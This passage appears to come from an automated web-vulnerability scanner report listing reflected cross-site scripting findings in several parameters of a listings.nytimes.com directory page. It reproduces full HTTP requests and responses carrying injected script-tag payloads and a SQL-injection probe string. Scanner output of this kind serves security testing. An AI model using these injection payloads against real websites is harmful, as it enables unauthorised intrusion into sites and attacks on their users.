GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-49944892ff6"><script>alert(1)</script>de58b90eedf804e2c&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91521
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCSTRAT=PGDDEGAAAECFIJFAPCALKMPF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsO" value="125-470909,125-481310,125-486834,125-490712,125-419767,125-497400,125-561713,125-496638,125-498359,125-49944892ff6"><script>alert(1)</script>de58b90eedf804e2c">
...[SNIP]...

4.303. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsO parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsO request parameter is copied into the HTML document as plain text between tags. The payload a5537<script>alert(1)</script>443662b952f was submitted in the sLsIdsO parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448a5537<script>alert(1)</script>443662b952f&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:44:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448a5537<script>alert(1)</script>443662b952f&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-
...[SNIP]...

4.304. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsP parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32dc3"><script>alert(1)</script>80be6c6f5a674ba32 was submitted in the sLsIdsP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-56173932dc3"><script>alert(1)</script>80be6c6f5a674ba32&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91525
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBSSQAT=PENKJLNDENPCLHPANGGAEBLG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsP" value="125-499423,125-499451,125-500061,125-500014,125-501827,125-504342,125-505889,125-505964,125-507572,125-56173932dc3"><script>alert(1)</script>80be6c6f5a674ba32">
...[SNIP]...

4.305. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsP parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsP request parameter is copied into the HTML document as plain text between tags. The payload 8e8d4<script>alert(1)</script>323f7cd9247 was submitted in the sLsIdsP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-5617398e8d4<script>alert(1)</script>323f7cd9247&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:45:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-5617398e8d4<script>alert(1)</script>323f7cd9247&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-
...[SNIP]...

4.306. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsQ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsQ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29321"><script>alert(1)</script>8fd183e334c4295ee was submitted in the sLsIdsQ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-